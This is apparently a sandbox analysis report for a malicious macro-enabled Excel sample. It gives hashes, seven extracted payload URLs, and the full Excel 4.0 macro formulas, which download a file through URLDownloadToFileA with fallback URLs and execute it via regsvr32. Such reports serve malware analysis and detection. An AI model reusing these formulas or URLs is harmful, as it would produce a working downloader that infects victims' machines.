Behavioral task
behavioral1
Sample
971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0.xlsm
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0.xlsm
Resource
win10v2004-20241007-en
General
-
Target
971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0
-
Size
37KB
-
MD5
c48c0424f9a8fdcae930b8782d738017
-
SHA1
97c3cecb4e447b4374e3ee5614458f5abecb2c88
-
SHA256
971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0
-
SHA512
bb7239fe527e698d1e15846b1de55c2a06decf0c216b17095fcdc32f415324253afe7125a91cc262ca32a1473e2683b7ed0cc7fbd9829195ee6d9b71177d4981
-
SSDEEP
768:5BnpO75ZJVzXxjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo1:30lpZOZZ1ZYpoQ/pMAQVr
Malware Config
Extracted
https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/
https://bigideas.com.au/images/w5FLAJPmvbk9/
https://webstream.jp/died-wing/oOzfVc/
https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/
https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/
https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/
https://breedid.nl/cgi-bin/aCbt/
-
formulas
(Excel 4.0 macro formulas, one cell per line. Each CALL asks urlmon's URLDownloadToFileA to save the listed URL as ..\dfeb.ses; the IF guards appear to try the next URL only when the previous call returned a negative, i.e. failed, result, and the final EXEC hands the saved file to regsvr32 -s. Host-side indicators are Excel starting regsvr32.exe and the dropped dfeb.ses.)
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/","..\dfeb.ses",0,0)
=IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bigideas.com.au/images/w5FLAJPmvbk9/","..\dfeb.ses",0,0))
=IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://webstream.jp/died-wing/oOzfVc/","..\dfeb.ses",0,0))
=IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/","..\dfeb.ses",0,0))
=IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/","..\dfeb.ses",0,0))
=IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/","..\dfeb.ses",0,0))
=IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://breedid.nl/cgi-bin/aCbt/","..\dfeb.ses",0,0))
=IF('HUNJK'!E27<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dfeb.ses")
=RETURN()
Signatures
Files
-
971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0.xlsm office2007